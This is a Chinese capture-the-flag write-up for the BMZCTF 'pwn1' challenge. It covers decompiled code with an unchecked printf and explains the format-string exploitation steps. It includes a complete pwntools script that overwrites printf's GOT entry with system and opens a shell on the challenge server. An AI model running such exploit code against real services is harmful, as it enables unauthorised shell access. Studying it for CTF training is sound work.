[BMZCTF-pwn] 22-pwn1

昨天整了第一届BMZCTF的pwn题,都来得及写。这一届一共五个pwn题,难度逐个增加。

第一个是个32位no pie,got表可写。程序很短,直接调用无格式参数的printf,而且有循环,got表还有system项。基本属于无障碍型。

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+18h] [ebp-70h] BYREF
  unsigned int v4; // [esp+7Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  init();
  menu();
  puts(" Wealcome to BMZCTF ");
  while ( 1 )
  {
    memset(s, 0, sizeof(s));
    read(0, s, 0x64u);
    printf(s);
  }
}

思路就是

先用AAAA-%X-%X-%X....得到偏移10

然后直接用fmtstr_payload工具生成串,将printf的got表内容改为plt[system]

最后再发送/bin/sh让printf执行system(/bin/sh)

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('www.bmzclub.cn', 21355) 

elf = ELF('./pwn')
context(arch = 'i386', log_level = 'debug') #

payload = fmtstr_payload(10, {elf.got['printf']: elf.plt['system']})
p.sendline(payload)
p.sendline(b'/bin/sh\x00')
p.sendline(b'cat /flag')
p.interactive()

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值